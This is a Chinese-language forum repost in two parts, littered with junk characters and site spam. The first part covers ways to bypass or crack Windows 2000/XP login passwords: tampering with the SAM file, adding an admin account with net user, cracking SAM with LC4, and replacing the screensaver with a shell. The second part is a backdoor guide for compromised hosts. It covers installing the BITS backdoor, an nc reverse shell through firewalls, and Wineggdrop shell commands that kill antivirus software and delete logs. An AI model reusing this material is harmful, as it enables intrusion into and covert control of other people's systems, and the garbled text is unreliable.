① 系統密碼被改進不去電腦怎麼辦
用啟動盤進入DOS,依次輸入:(以下假設c盤為系統盤。)
del c:windows\system32\config\sam
c:windows\repair\sam c:windows\system32\config
這種方法最關鍵是repair文件下有一個備份過的SAM文件,如果你在優化系統時刪除了,那我只能說:對不起,讓你白看了這么多!
此方法在FAT32 、WinXP SP1、sp2下測試通過。 如果是NTFS格式的,可以用DOS for NTFS試試。2000 SP4也應該沒問題,大家自己可以試試
在DOS下面新建用戶:net user USERa(用戶名) 123456(密碼) /Add .接著使用「net localgroup administrators USERa(用戶名) /Add」命令提升USERa用戶為管理員級別,即擁有所有許可權操作系統
忘記系統登入密碼的十幾種解決辦法首先提議:
如果你是一個很容易遺忘的人,那麼一定不要忘記在第一次設置密碼的同時創建一張可以恢復Windows XP中的賬戶密碼的啟動盤,它可以讓你免去格式化硬碟的煩惱。 從「控制面板」中找到「用戶賬戶」項,選中自己的賬戶進入如圖所示的控制界面,我們可以看到左側任務列表中有一項「阻止一個已忘記的密碼」,點擊後便可打開「忘記密碼向導」,向導會提示插入一張格式化過的空白磁碟,操作過程中會讓你輸入該賬戶所使用的密碼,很快便可以創建一張密碼重設盤。以後,當我們忘記了賬戶密碼的時候,在沒有使用「歡迎屏幕」登錄方式的情況下登錄到Windows XP後,按下「Ctrl + Alt + Del」組合鍵,出現「Windows 安全」窗口,點擊選項中「更改密碼」按鈕,出現更改密碼窗口。這個窗口中,將當前用戶的密碼備份,點擊左下角「備份」按鈕,激活「忘記密碼向導」,按照提示創建密碼重設盤。如果在Windows XP的登錄窗口輸入了錯誤的密碼,就會彈出「登錄失敗」窗口,如果你的確想不起來自己的密碼是什麼時,可點擊「重設」按鈕,啟動密碼重設向導,通過剛才所創建的密碼重設盤,就可以用這張密碼重設盤更改密碼並啟動系統。重新設定密碼,登錄Windows XP。 「密碼重設盤」的創建,含有一定的危險性,因為任何人都可以使用這一張「密碼重設盤」來登錄Windows XP,都可以以該用戶的名義進入用戶帳戶,操作真正用戶所能操作的一切,所以必須將「密碼重設盤」保存在適當的地方,以防丟失或失泄密。J¬X H H
V ] ---------------------------------------中
方法1——利用「administrator」(此方法適用於管理員用戶名不是「administrator」的情況)我們知道在安裝Windows XP過程中,首先是以「administrator」默認登錄,然後會要求創建一個新賬戶,以進入Windows XP時使用此新建賬戶登錄,而且在Windows XP的登錄界面中也只會出現創建的這個用戶賬號,不會出現「administrator」,但實際上該「administrator」賬號還是存在的,並且密碼為空。當我們了解了這一點以後,假如忘記了登錄密碼的話,在登錄界面上,按住Ctrl+Alt鍵,再按住Del鍵二次,即可出現經典的登錄畫面,此時在用戶名處鍵入「administrator」,密碼為空進入,然後再修改「zhangbp」的口令即可。---------------------------------------------bbs.chinesei h
方法2——刪除SAM文件(注意,此法只適用於WIN2000)Windows NT/2000/XP中對用戶帳戶的安全管理使用了安全帳號管理器(Security Account Manager , SAM)的機制,安全帳號管理器對帳號的管理是通過安全標識進行的,安全標識在帳號創建時就同時創建,一旦帳號被刪除,安全標識也同時被刪。安全標識是唯一的,即使是相同的用戶名,在每次創建時獲得的安全標識完全不同。因此,一旦某個帳號被用戶名重建帳號,也會被賦予不同的安全標識,不會保留原來的許可權。安全帳號管理器的具體表現就是%SystemRoot%\system32\config\sam文件。SAM文件是Windows NT/2000/XP的用戶帳戶資料庫,所有用戶的登錄名以及口令等相關信息都會保存在這個文件中。知道了這些,我們的解決辦法也產生了:刪除SAM文件,啟動系統,它會重建一個干凈清白的SAM,裡面自然沒有密碼了。
不過,這么簡單的方法在XP是不適用的,可能微軟以此為BUG,做了限制……所以現在在XP系統下,即使你刪除了SAM,還是不能刪除密碼,反而會使系統啟動初始化出錯,從而進入死循環而不能進系統!! --------------------------------------------- B6H i-[#D }-
方法3——從SAM文件中找密碼(前提……會使用DOS基本命令就行)在系統啟動前,插入啟動盤,進入:C:\WINNT\System3\Config\ 用COPY命令將SAM文件復制到軟盤上。拿到另一台機子讀取。這里需要的工具是LC4,運行LC4,打開並新建一個任務,然後依次擊「IMPORT→Import from SAM file」,打開已待破解的SAM文件,此時LC4會自動分析此文件,並顯示出文件中的用戶名;之後點擊「Session→Begin Audit」,即可開始破解密碼。如果密碼不是很復雜的話,很短的時間內就會得到結果。 不過,如果密碼比較復雜的話,需要時間會很長,這時我們就需要用下面的方法了。
---------------------------------------------中文之T
方法4——用其他SAM文件覆蓋(前提是你可以得到另外一台電腦的SAM文件和它的密碼……個人覺得是最為可行的辦法)1——如上所說,SAM文件保存著登錄名以及口令,那麼我們只要替換SAM文件就是替換登錄名以及口令了。不過,這個替換用的SAM文件的「產地」硬碟分區格式要和你的系統一樣(看是FAT32還是NTFS,你自己確認)。最好這個「產地」的系統沒有設密碼,安全方面設置沒動過(實際上很大部分的個人電腦都是這樣),當然,比較保險的方式是把XP的[Win NT\System 32\Config\]下的所有文件覆蓋到[C:\Win NT\System 32\Config\]目錄中(假設你的XP安裝在默認分區C:),2——如果得不到別人的幫助(我是說「萬一」),你可以在別的分區上在安裝一個XP系統,硬碟分區格式要和原來的一樣,並且請你注意一定不要和原來的XP安裝在同一分區!在開始之前,一定要事先備份引導區MBR,備份MBR的方法有很多,使用工具軟體,如殺毒軟體KV3000等。裝完後用Administrator登陸,現在你對原來的XP就有絕對的寫許可權了,你可以把原來的SAM考下來,用10PHTCRACK得到原來的密碼。也可以把新安裝的XP的Win NT\System 32\Config\下的所有文件覆蓋到C:\Win NT\System 32\Config\目錄中(架設原來的XP安裝在這里),然後用KV3000恢復以前悲憤的主引導區MBR,現在你就可以用Administrator身份登陸XP了。 [2號方案我自己都覺得麻煩,還是1號:叫別人幫忙比較好……]
【另外,據說C:\windows\repair 目錄下的SAM是原始版本的,可以用它來覆蓋 system32下的這個 SAM,這樣就可以刪除現在的密碼,而恢復到剛開始安裝系統時的密碼了。如果這個密碼為空,豈不是…… 】 中文之家---------------------------------------------中
方法5——使用Win 2000安裝光碟引導修復系統(前提……很明顯吧?就是你要有一張Win 2000安裝光碟) bbs.chinesejia. 使用Win 2000安裝光碟啟動電腦,在Wndows2000安裝選擇界面選擇修復Windows 2000(按R鍵);,然後選擇使用故障控制台修復(按C鍵),系統會掃描現有的Window2000/XP版本。一般只有一個操作系統,所以只列出了一個登錄選擇(l:C:\Windows)。從鍵盤上按l,然後回車,這個時候,Window XP並沒有要求輸人管理員密碼,而是直接登錄進入了故障恢復控制台模式(如果使用的是Windows XP安裝光碟啟動的,那是要求輸人管理員密碼的。這里指的管理員是指系統內建的Administraor賬戶)熟悉Windows的朋友都知道,故障恢復控制台裡面可以進行任何系統級別的操作,例如:復制、移動、刪除文件,啟動、停止服務,甚至格式化、重新分區等破壞性操作。 測試使用光碟:集成SP3的Windows 2000 Proessional 簡體中文版。-?!I7Z O V u'r 測試通過的系統:Windows XP Proessional,打SPI補丁的Windows XP (FAT32和NTFS文件系統都一樣)bbs.chinesejia.com8U L¬w T [需要注意的是,由於各種原因,市面上的一些Windows 2000安裝光碟不能夠顯現故障控制台登錄選項,所以也無法利用這個漏洞。同時,由於故障控制台模式本身的限制,也無法從網路上利用這個漏洞,換句話說,這個漏洞僅限於單機。]
---------------------------------------------
方法6——利用NET命令(有兩個必要前提才行:按裝WINDOWS XP的分區必須採用FAT 32文件小系統,用戶名中沒有漢字。)S&q5@ I*I Y)t 我們知道在Windows XP中提供了「net user」命令,該命令可以添加、修改用戶賬戶信息,其語法格式為: net user [UserName [Password | *] [options]] [/domain] net user [UserName {Password | *} /add [options] [/domain] net user [UserName [/delete] [/domain]] D每個參數的具體含義在Windows XP幫助中已做了詳細的說明,在此筆者就不多闡述了。好了,我們現在以恢復本地用戶「zhangbq」口令為例,來說明解決忘記登錄密碼的步驟:
1、重新啟動計算機,在啟動畫面出現後馬上按下F8鍵,選擇「帶命令行的安全模式」。
2、運行過程結束時,系統列出了系統超級用戶「administrator」和本地用戶「zhangbq」的選擇菜單,滑鼠單擊「administrator」,進入命令行模式。
3、鍵入命令:「net user zhangbq 123456 /add」,強制將「zhangbq」用戶的口令更改為「123456」。若想在此添加一新用戶(如:用戶名為abcdef,口令為123456)的話,請鍵入「net user abcdef 123456 /add」,添加後可用「net localgroup administrators abcdef /add」命令將用戶提升為系統管理組「administrators」的用戶,並使其具有超級許可權。bbs.chinesejia.com8R z }![4`
4、重新啟動計算機,選擇正常模式下運行,就可以用更改後的口令「123456」登錄「zhangbq」用戶了。另外,zhangbq 進入 登入後在〔控制台〕→〔使用者帳戶〕→選忘記密碼的用戶,然後選〔移除密碼〕後〔等出〕 在登入畫面中選原來的用戶便可不需密碼情況下等入 (因已移除了) 刪除剛才新增的用戶,在〔控制台〕→〔使用者帳戶〕→選〔alanhkg888〕,然後選〔移除帳戶〕便可中文之家論壇#B2F
e;A!\ P( [但是有人提出:在實驗後得知——在安全模式命令符下新建的用戶不能進入正常模式(此結論暫不確認)]
方法7——用破解密碼軟體(前提是你要有標準的系統安裝光碟——不是那種「集成」多個系統的D版盤) bbs.chinesejia.com wj)\6[$R
1——使用PASSWARE KIT 5.0中的Windows KEY 5.0,用於恢復系統管理員的密碼,運行後生成3個文件:TXTSETUP.OEM、WINKEY.SYS和WINKEY.INF,3個文件共50KB。把這3個文件放在任何軟盤中,然後使用XP安裝光碟啟動電腦,啟動過程中按F6鍵讓系統採用第三方驅動程序。此時,正是我們切入的最好時機,放入該軟盤就會自動跳到Windows KEY的界面。他會強行把ADMINISTRATOR的密碼換成12345,如此一來何愁大事不成?嗬嗬!當你重新啟動以後,你會被要求再次修改你的密碼。
2——使用OFFICE NT PASSWORD & REGISTRY EDITOR.用該軟體可以製作LINUX啟動盤,這個啟動盤可以訪問NTFS文件系統,因此可以很好地支持Windows 2000/XP。使用該軟盤中的一個運行在LINUX下的工具NTPASSWD就可以解決問題,並且可以讀取注冊表並重寫賬號。使用方法很簡單,只需根據其啟動後的提示一步一步做就可以了。在此,建議你使用快速模式,這樣會列出用戶供你選擇修改那個用戶密碼。默認選擇ADMIN組用戶,自動找到把ADMINISTRATOR的名字換掉的用戶,十分方便。中文之家,軟體,影視,圖片,音樂,游戲,文學,娛樂,下載,在線,軍事 t'`8x"a!J
3——ERD.Commander2003為Windows的管理員和最終用戶,面對隨時可能崩潰的系統,可能每人都會有自己的一套工具,用來挽救數據和修復系統。ERD Commander這可以算是Winternals Administrators' Pak工具中最強大的組件了,其中一個引人注目的功能就是修改密碼,Windows NT/2000/XP/2003 系統中任何一個用戶的密碼都可以在不知道原先密碼的情況下被ERD修改掉。
d5\---------------------------------------------中文之家
方法8——修改屏幕保護程序(前提是你有設置屏保)使用NTFSDOS這個可以從DOS下寫NTFS分區的工具。用該軟體製作一個DOS啟動盤,然後到C:\Win NT\System 32下將屏幕保護程序Logon.Scr改名,接著拷貝Command.com到C:\Win NT\System 32下(WIN2000下可以用CMD.EXE),並將該文件改名為Logon.Scr。這樣啟動機器15分鍾以後,本該出現的屏幕保護現在變成了命令行模式,而且是具有ADMINISTRATOR許可權的,通過他就可以修改密碼或者添加新的管理員賬號了。改完以後不要忘了把屏幕保護程序的名字改回去。
---------------------------------------------中文之
2j方法9——使用啟動腳本(前提……會使用DOS基本命令就行)
Windows XP啟動腳本(startup scrīpts)是計算機在登錄屏幕出現之前運行的批處理文件,它的功能類似於Windows 9×和DOS中的自動執行批處理文件autoexec.bat。利用這個特性,可以編寫一個批處理文件重新設置用戶密碼,並將它加入啟動腳本中,這樣就達到了目的。以下是具體步驟(假設系統目錄為C:\Windows)。
1.使用Windows98啟動盤啟動電腦。在DOS下新建一個文件叫a.bat,內容只需要一條「net user」命令即可:「Net user rwd 12345678」。這條命令的意思是將用戶rwd的密碼設置為「12345678」(有關Net命令的用法,可參考Windows幫助)。然後將文件a.bat保存到「C:\windows\system32\GroupPolicy\Machine\scrīpts\Startup」下。
2.編寫一個啟動/關機腳本配置文件scrīpts.ini,這個文件名是固定的,不能改變。內容如下:中文之家,論壇,軟體,影視,圖片,音樂,游戲,文學,娛樂,下載,在線,軍事%l v,R!b W \#^ M D
[Startup]中文之家,軟體,影視,圖片,音樂,游戲,文學,娛樂,下載,在線,軍事+X9x2B6m:E"e v @ V V
0CmdLine=a.bat
0Parameters=中文之家,論壇,軟體,影視,圖片,音樂,游戲,文學,娛樂,下載,在線,軍事3L e&o2H&{
3.將文件scrīpts.ini保存到「C:\winnt\system32\GroupPolicy\Machine\scrīpts」下。scrīpts.ini保存著計算機啟動/關機腳本的設置數據,文件內容通常包含兩個數據段:[Startup]和[Shutdown]。[Startup]數據段下是啟動腳本配置,[Shutdown]數據段下是關機腳本配置。每個腳本條目被分成腳本名和腳本參數兩部分存儲,腳本名保存在XCmdLine關鍵字下,參數保存在XParameters關鍵字下,這里的X表示從0開始的腳本序號,以區別多個腳本條目和標志各腳本條目的運行順序。中文之家,論壇,軟體,影視,圖片,音樂,游戲,文學,娛樂,下載,在線,軍事 w;o _ s9u G d h
4.取出Windows 98啟動盤,重新啟動電腦,等待啟動腳本運行。啟動腳本運行結束後用戶rwd的密碼就被恢復為「12345678」。
5.登錄成功後刪除上述步驟建立的兩個文件。
[實際上你可以借用另一台電腦用「記事本」編寫a.bat和scrīpts.ini,再用軟盤通過DOS復制到自己的電腦上] 說明:Q,{ 以上腳本使用的是FAT32文件系統,如果使用NTFS文件系統,可以將這塊硬碟以從盤模式掛接到其它能識別NTFS文件系統(如Windows 2000或Windows XP)的計算機上進行上述操作。本方法可以恢復管理員(Administrator)的密碼。對Windows2000系統中本地計算機用戶和域用戶的密碼恢復同樣有效。&r m ` Y N)s"u
------------------------------------------------------------------------------------------------------
個人瞎猜的方法
[1[G `¬y S==============bbs.chinesej
m-z6l 方法10——利用輸入法漏洞(前提是進入系統看見的不是歡迎界面,而是一般的系統網路用戶登陸窗口)
[其奧義取自網管軟體登陸的破解,沒有在系統里實驗過。不過倒也沒有後遺症,你們姑且試試]bbs.chinesejia.com Y P"i K9` fh r
按ctrl+shift打開拼音輸入法,出現拼音的狀態條,在狀態條上點擊右鍵,就會出現一個下拉菜單,選擇其中的定義片語(放心,就算系統限制右鍵,在這也不管用)然後選擇文件菜單裡面的保存,就會調出保存對話框,然後隨便選擇一個文件夾,點擊右鍵,選擇資源管理器,打開,進去添加個超級用戶,一切就OK啦!
(另外也可以用下拉菜單里的[幫助],打開CHM幫助文件,[選項]-[Internet選項]-[Internet臨時文件夾]-[設置]-[查看文件],同樣可以進文件夾)中文之家,軟體,影視,圖片,音樂,游戲,文學,娛樂,下載,在線,軍事 X!v S"j.b
另外也可以利用輸入法BUG,這個方法很簡單:就是調出輸入法,調到智能ABC,輸入VV。然後按左方向鍵,游標到字母最前面,按DEL刪掉,按空格,這時系統提示出錯,登陸窗口就被關掉了。進去後……要怎麼做,不用多說吧?中文之家,論壇,軟體,影視,圖片,音樂,游戲,文學,娛樂,下載,在線,軍事 K3t7^ l'u k
A,p V n Q ?[這方法的初衷無非是先進入系統,再更改添加用戶。大不了放棄原先的管理員用戶,自己另建一個使用……]
方法11——使用注冊表(前提……你敢修改注冊表) [借鑒於「修改注冊表自動登陸系統」]
「修改注冊表自動登陸系統」的內容如下:
【單擊「開始 運行」,在輸入框中鍵入「regedit」打開注冊表編輯器,然後在注冊表編輯器左方控制台中依次單擊展開「HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/Current Version/Winlogon」,再選擇「編輯 添加 字元串值」,在數值名稱中鍵入「AutoAdminLogon」,然後在窗口中的空白位置上點一下,再雙擊剛新建的字元串「AutoAdminLogon」,在彈出的「編輯字元串」對話框中輸入「1」設置系統允許自動登錄。再重復以上的操作,創建一個名為「DefaultUserName」的字元串值,編輯字元串為您准備用於自動登錄的賬戶名稱。再新創建一個名為「Defaultpassword」的字元串值,並編輯字元串為您准備用於自動登錄的用戶賬戶密碼,編輯完並檢查無誤後,關閉注冊表編輯器並重新啟動電腦即可自動登錄。注意,如果已有「DefaultUserName」,可以不必重新創建,直接更改原有字元串值。如果您的系統工作在區域網環境下,並且在登錄到系統上時需要登錄域伺服器,那麼您還需要再添加一個「DefaultDomainName」並編輯字元串為您登錄的域名稱。】
而我在修改注冊表時,發現裡面本來就有「Defaultpassword」的字元串,(這是我的個人情況),當然,我原來就沒有設密碼,所以字元串的值為空。我是想,如果你們的系統也有「Defaultpassword」的字元串,那是否它的值就是密碼呢?
或者你們誰敢以上文的方法修改注冊表,沒准會屏蔽原先的登陸窗口呢!當然,要先備份注冊表。
關於SAM文件
%N 使用過NT內核Windows操作系統的朋友都知道NT內核對系統密碼的管理機制比Win32內核的Windows操作系統要強得多,這部分歸功於NT系統的門衛——SAM。 a x F u3U+r0K對於Windows的啟動,很多用戶並沒什麼特別的想法,大多數的人都這樣看待這個問題:按下電源,稍等片刻,「傻瓜化」的Windows登錄界面就出現在我們眼前。但是看了此文,你也許就會有點不同的想法了。
bbs.chi微軟做了兩個不同的系統骨架,一個叫Win32,我們用的Win9x/Me系統就附在它上面;另一個叫NT(New Technology),也就是WinNT/2000/XP/2003的骨架。不過很不幸,微軟有點「偏心」,Win32的骨架做得明顯有點過小,所以它成了瘦子,而NT則是典型的美國壯漢。更不幸的是,微軟給Win32配備的PWL門衛是個花瓶,不僅連個家門都看不住,而且嘴巴也守不住秘密;而NT呢,又撈了個好處,SAM門衛盡心盡責,嘴巴也難撬開。NT內核Windows操作系統的密碼安全性較Win32內核Windows操作系統的密碼安全性高出很多跟SAM不無關系,在這篇文章里,我們就一起來認識一下NT內核Windows操作系統的看門神——SAM。
Y¬?¬T h忠實的SAM門衛 中文之g%{"W(D4So r
SAM最初是跟隨第一代NT來到世界的,它在微軟總部的特工代號叫做「安全賬戶管理器」(Security Accounts Manager),經歷了幾代系統的改進,這個門衛越來越強壯了。SAM平時居住在WINNT\System32\Config下。當然,它不僅僅是一個SAM文件這么簡單,它還帶有一名隨從:Security(如圖1所示)。在NT內核Windows系統啟動的時候,SAM就開始忙碌了,首先,它在入口處要求你出示身份證——沒有?那麼就不能進入Windows,並且沒得商量。即使你通過了「門檢」,事情也還遠遠沒有結束,SAM隨時盯著你呢,只要哪裡又有人進來了,它就趕緊去問人家要「證件」……SAM記錄的數據很多,包括所有組、賬戶信息、密碼HASH、賬戶SID等,應該說是一個考慮得比較周全的門衛。
前面說過了,SAM不僅僅是一個文件那麼簡單,它不但有文件數據,在注冊表裡面還有一個資料庫,位於HKEY_LOCAL_MACHINE\SAM下,這是一個比較復雜的結構(如圖所示)。SAM在系統啟動後就處於鎖定狀態,我們沒法擅自更改這個文件內容。
SAM的主要結構和用戶分組
從上述注冊表裡的分支我們可以看到以下結果: 中文之家,軟體,影視,圖片,音樂,游戲,文學,娛樂,下載,在線,軍事 \3a C+T)f [ m7~
1.在HKEY_LOCAL_MACHINE\SAM\SAM\
Domains下就是SAM的內容,其下有兩個分支「Account」和「Builtin」。 中文之家論壇8A:t;S
2.Domains\Account\Users下存放的就是各個賬號的信息,當然,這里是加密過的二進制數據,每個賬號下面有兩個子項,F和V。項目V中保存的是賬戶的基本資料,用戶名、所屬組、描述、密碼、注釋、是否可以更改密碼、賬戶啟用、密碼設置時間等。項目F中保存的是一些登錄記錄,比如上次登錄時間、錯誤登錄次數等。SAM靠這些齊全的備忘錄來保存與用戶賬號相關的各種信息。 bbs.chinesejia.com W b S:i s|(bv$C J
3.Domains\Builtin存放著不同用戶分組信息,SAM就是根據這個來劃分NT中固有的6個不同的工作組的,它們分別是:管理員(Administrators)、備份操作員(Backup Operators)、客人(Guests)、高許可權用戶(Power Users)、修復員(Replicator)和普通用戶(Users)。
中文幕後指揮官
在Windows系統中,雖然SAM如此盡力,但是它卻如《Terminator 3(終結者3)》里MODEL 101的設置一樣,不聽從你的指揮。它只聽本地安全認證(Local Security Authority)程序——LSASS.EXE的差遣,就連進門時的審查也是LSASS的指示。如果你把LSASS殺了,你就等著被趕出門吧——當然,對於普通用戶來說,如果你試圖用普通的進程管理工具或者Windows系統的進程管理殺掉「LSASS.EXE」進程的話,只會得到「該進程為關鍵系統進程,任務管理器無法結束進程。」的提示,本地安全認證(Local Security Authority)在Windows系統中主要負責以下任務:1.重新找回本地組的SID和用戶許可權;2.創建用戶的訪問令牌;3.管理本地安裝的服務所使用的服務賬號;4. 存儲和映射用戶許可權;5.管理審核的策略和設置;6.管理信任關系。 中文之家,軟體,影視,圖片,音樂,游戲,文學,娛樂,下載,在線,軍事 _ W;X w h
「薩姆也是人」
中文俗話說,「人無完人」。盡管SAM(薩姆)是這么盡心盡責,可是在這里,我們還是必須用那句話——「薩姆也是人」來形容它。由於一些設計上的失誤,在WinNT/2000里,如果你忘記了密碼,那麼你要做的不是呼天喊地,只需要在非NT環境里把SAM驅逐出硬碟就可以了。但是在XP以後的Windows操作系統里,這個情況得以改善,如果你把薩姆大叔踢了,NT也躲著死活不肯出來了。
當然,這也並不是說XP以後的Windows的操作系統密碼都無法破解,要知道:經典的LC4和NtPassword都專門拿SAM開刀.
② 後門程序的分類
後門可以按照很多方式來分類,標准不同自然分類就不同,為了便於大家理解,我們從技術方面來考慮後門程序的分類方法: 此類後門程序一般都是伺服器上正常 的web服務來構造自己的連接方式,比如非常流行的ASP、cgi腳本後門等。
網頁後門,網路上針對系統漏洞的攻擊事件漸漸少了,因為大家在認識到網路安全的重要性之後,最簡單卻又最有效的防護辦法:升級,都被大家所認同,所以系統漏洞在以後的歲月中存活的周期會越來越短,而從最近的趨勢來看,腳本漏洞已經漸漸取代了系統漏洞的地位,非常多的人開始研究起腳本漏洞來,sql注入也開始成為各大安全站點首要關注熱點,找到提升許可權的突破口,進而拿到伺服器的系統許可權。
asp、CGI、PHP這三個腳本大類在網路上的普遍運用帶來了腳本後門在這三方面的發展。
線程插入後門
利用系統自身的某個服務或者線程,將後門程序插入到其中,具體原理原來《黑客防線》曾具體講解過,感興趣的朋友可以查閱。這也是現在最流行的一個後門技術。
擴展後門
所謂的「擴展」,是指在功能上有大的提升,比普通的單一功能的後門有很強的使用性,這種後門本身就相當於一個小的安全工具包,能實現非常多的常見安全功能,適合新手使用————但是,功能越強,個人覺得反而脫離了後門「隱蔽」的初衷,具體看法就看各位使用者的喜好了。
c/s後門
和傳統的木馬程序類似的控制方法,採用「客戶端/服務端」的控制方式,通過某種特定的訪問方式來啟動後門進而控制伺服器。
root kit 6o f3H 3B
這個需要單獨說明,其實把它單獨列一個類在這里是不太恰當的,但是,root kit的出現大大改變了後門程序的思維角度和使用理念,可以說一個好的root kit就是一個完全的系統殺手!後文我們講涉及到這方面,一定不會讓大家失望!
上面是按照技術做的分類,除了這些方面,正向連接後門、反向連接後門等分類也是很常見的,其實如何分類是編程者考慮的事,廣大的使用者就不用考慮那麼多了,我們看重的,只是功能! 首先我們來簡單解釋一下什麼是典型的線程插入後門:這種後門在運行時沒有進程,所有網路操作均播入到其他應用程序的進程中完成。也就是說,即使受控制端安裝的防火牆擁有「應用程序訪問許可權」的功能,也不能對這樣的後門進行有效的警告和攔截,也就使對方的防火牆形同虛設了!因為對它的查殺比較困難,這種後門本身的功能比較強大,是「居中家旅行、入侵攻擊」的必備品哦!
這類的典範就是國內提倡網路共享的小榕的BITS了,從它的推出以來,各類安全工具下載園地里BITS就高居榜首,非常多的朋友使用它的過程中感到了方便。類型:系統後門
使用范圍:wind200/xp/2003
隱蔽程序:★★★★☆
使用難度:★★★☆☆
查殺難度:★★★★☆
BITS其實是Background Intelligent Transfer Servicer的縮寫,可以在不知不覺中實現另一種意義的典型的線程插入後門,有以下特點:進程管理器中看不到;平時沒有埠,只是在系統中充當卧底的角色;提供正向連接和反向連接兩種功能;僅適合用於windows 200/xp/2003。
運用舉例
首先我們用3389登錄上肉雞,確定你有SYSTEM的許可權,將BITS.DLL拷貝到伺服器上,執行CMD命令: 4 #R Br A
rundll32.exebits.dll,install
這樣就激活了BIST,程序用這個特徵的字元來辨認使用者,也就相當於你的密碼了,然後卸載:rundll32.exe BITS.dll,Uninstall
這是最簡單的使用,這個後門除了隱蔽性好外,還有兩大特點是非常 值得借鑒的:埠復用和正反向連接。雖然很多朋友經常聽到這兩個名詞,但並不了解它們,埠復用就是利用系統正常的TCP埠通訊和控制,比如80、139等,這樣的後門有個非常 大的好處就是非常 隱蔽,不用自己開埠也不會暴露自己的訪問,因為通訊本身就是系統的正常訪問!另一個是反向連接,這個很常 見,也是後門中一個經典思路,因為從伺服器上主動方問外邊是不被禁止的,很多很歷害的防火牆就怕這點!
BITS的正向連接很簡單,大家可以參考它的README,這種方式在伺服器沒有防火牆等措施的時候很管用,可以方便地連接,但是遇到有防火牆這樣的方式就不靈了,得使用下面的反向連接方式: 70 +g3l
在本地使用NC監聽(如:nc -l -p 1234)
用NC連接目標主機的任何一個防火牆允許的TCP埠(80/139/445……)
輸入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email] ^q/hQ , 4
目標主機的CMD將會出現NC監聽的埠2222,這樣就實現了繞過防火牆的功能了。 所謂的擴展後門,在普通意義上理解,可以看成是將非常多的功能集成到了後門里,讓後門本身就可以實現很多功能,方便直接控制肉雞或者伺服器,這類的後門非常受初學者的喜愛,通常集成了文件上傳/下載、系統用戶檢測、HTTP訪問、終端安裝、埠開放、啟動/停止服務等功能,本身就是個小的工具包,功能強大。
Wineggdroup shell j;類型:系統後門
使用范圍:win2000/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程度:★★★★☆
查殺難度:★★★★☆
這個後門是擴展後門中很有代表性的一個,功能這全面讓人嘆為觀止,它能實現如下比較有特色的功能:進程管理,可查看,殺進程(支持用進程名或PID來殺進程);注冊表管現(查看,刪除,增加等功能);服務管理(停止,啟動,枚舉,配置,刪除服務等功能)埠到程序關聯功能(fport);系統重啟,關電源,注銷等功能(reboot,poweroff,shutdown,logoff);嗅探密碼功能;安裝終端,修改終端埠功能;埠重定向功能(多線程,並且可限制連接者IP);HTTP服務功能(多線程,並且可限制連接者IP);Socd5代理功能(支持兩種不同方式驗證,可限制連接者IP);克隆賬號,檢測克隆賬戶功能(clone,checkclone);加強了的FindpassWord功能(可以得到所有登錄用戶,包括使用克隆賬戶遠程登錄用戶密碼);HTTP代理(完全匿名,支持oicq、 MSN、mirc等程序);其他輔助功能,http下載,刪除日誌,系統信息,恢復常用關聯,枚舉系統賬戶等。
當網路上剛推出這個後門的時候,非常多的人用它來替換自己原來使用的後門,一時間各處贊揚之聲迭起,但多為一些普通的打撈手的心聲,其實它和「後門」的原始定義是有出入的:一旦你需要實現越多的功能,那你的程序在執行、隱藏、穩定等方面就需要考慮非常多的問題,一個疏忽就會導致全盤皆敗,所以不建議將此後門用在需要非常隱蔽的地方。
運用舉例
在安裝後門前,需要使用它自帶的EditServer.exe程序對服務端進行非常詳細的配置,從10個具體配置中,包括了插入線程、密碼、IP登錄郵件通告等方面,不難看出它的功能是非常強大的,隱蔽性也很強,下面說幾個在入侵中常用的功能,相信經常玩入侵的朋友一定能發現它的強大之處:
Fport:列出進程到埠的列表,用於發現系統中運行程序所對應的埠,可以用來檢測常見的隱蔽的後門。
Reboot:重啟系統,如果你上傳並運行了其他後門程序,並需要重啟機器以便讓後門正常工作,那使用這個命令吧! Uz
Shell:得到一個Dos Shell,這個不多講了,直接得到伺服器或者肉雞上的cmd shell。
Pskill PID或程序名:用於殺掉特定的服務,比如殺毒軟體或者是防火牆。
Execute程序:在後台中執行程序,比如sniffer等。http://ip/文件名 保存文件名:下載程序,直接從網上down一個後門到伺服器上。
Installterm埠:在沒有安裝終端服務的win2k服務版的系統中安裝終端服務,重啟系統後才生效,並可以自定義連接埠,比如不用3389而用其他埠。
StopService/StartService:停止或者啟動某個系統服務,比如telnet。
CleanEvent:刪除系統日誌。
Redirect:TCP數據轉發,這個功能是後門程序中非常出色的一個功能,可以通過某一埠的數據轉發來控制內網的機器,在滲透入侵的時候非常管用!
EnumService:列舉所有自動啟動的服務的資料,比如後門、木馬。
RegEdit:進入注冊表操作模式,熟悉注冊表的使用者終於在後門中找到了福音! !
Findpassword:得到所有登錄用戶密碼,比我們常用的findpass功能可強多了。
總體來講,Wineggdrop shell是後門程序中很出彩的一個,它經過作者幾次大規模的修改和升級,已經趨於穩定,功能的強大當然沒得說,但是由於功能太強大,被查殺和懷疑是難以避免的,所以很多人在使用Wineggdrop shell一段時間後就發現肉雞飛了,其實是很正常的事,我你出不用氣餒,其實用很簡單的方法就可以很好地提高它的隱蔽性,下文將有說明。
相對於Wineggdrop shell來說,獨孤劍客的winshell在功能上就不那麼全面了,但是筆者推薦新手更多的使用winshell而不是Wineggdrop shell,因為winshell功能除了獲得一個shell以外,只加入了一些重啟、關閉伺服器的命令,功能相對簡單,但完全使用系統自帶的cmd來執行命令,對系統學習和掌握也是非常有幫助的!
Winshell和wolf這兩者都是國內早期頂尖的後門程序,程序的編制無疑是非常經典的,新手學習時使用這兩款後門一定能讓你明白很多系統相關東西,了解很多入侵思路和方法。 傳統的木馬程序常常使用C/S構架,這樣的構架很方便控制,也在一定程度上避免了「萬能密碼」的情況出現,對後門私有化有一定的貢獻,這方面分類比較模糊,很多後門可以歸結到此類中,比如較巧妙的就是ICMP Door了
類型:系統後門
使用范圍:win2000/xp/2003 2Z6
隱蔽程度:★★★★★
使用難度:★★★☆☆
危害程度:★★★★☆
查殺難度:★★★★★
這個後門利用ICMP通道進行通信,所以不開任何埠,只是利用系統本身的ICMP包進行控制安裝成系統服務後,開機自動運行,可以穿透很多防火牆——很明顯可以看出它的最大特點:不開任何埠~只通過ICMP控制!和上面任何一款後門程序相比,它的控制方式是很特殊的,連80埠都不用開放,不得不佩服務程序編制都在這方面獨特的思維角度和眼光!
運用舉例
